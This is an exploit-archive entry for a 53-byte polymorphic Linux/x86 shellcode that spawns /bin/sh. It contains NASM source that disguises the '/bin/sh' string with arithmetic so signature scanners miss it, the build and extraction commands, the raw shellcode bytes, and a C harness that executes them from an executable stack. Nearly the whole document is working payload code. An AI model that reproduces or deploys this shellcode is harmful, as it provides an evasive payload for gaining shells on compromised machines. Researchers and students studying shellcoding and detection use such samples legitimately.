/* # Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) # Date: 10-Jan-2018 # Exploit Author: Debashis Pal # SLAE-1122 # Tested on: i686 GNU/Linux # '//bin/sh' = 0x68732f6e 0x69622f2f ########## polymorphic.nasm ########## global _start section .text _start: add esi, 0x30 ;junk xor ecx, ecx mul ecx mov dword [esp-4], ecx sub esp, 4 mov esi, 0x353ffc3b add esi, 0x33333333 ; 0x68732f6e mov dword [esp-4], esi mov edi, 0xada67373 sub edi, 0x44444444 ; 0x69622f2f mov dword [esp-8], edi sub esp, 8 mov ebx, esp mov al, 11 int 0x80 #################################### $ nasm -f elf polymorphic.nasm $ ld -o polymorphic polymorphic.o $ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' "\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80" $ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32 $ ./x86PolymorphicShellcodelinux32 Shellcode Length: 53 $ uname -a Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux $ #################################### */ #include #include unsigned char code[] = \ "\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35" "\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44" "\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }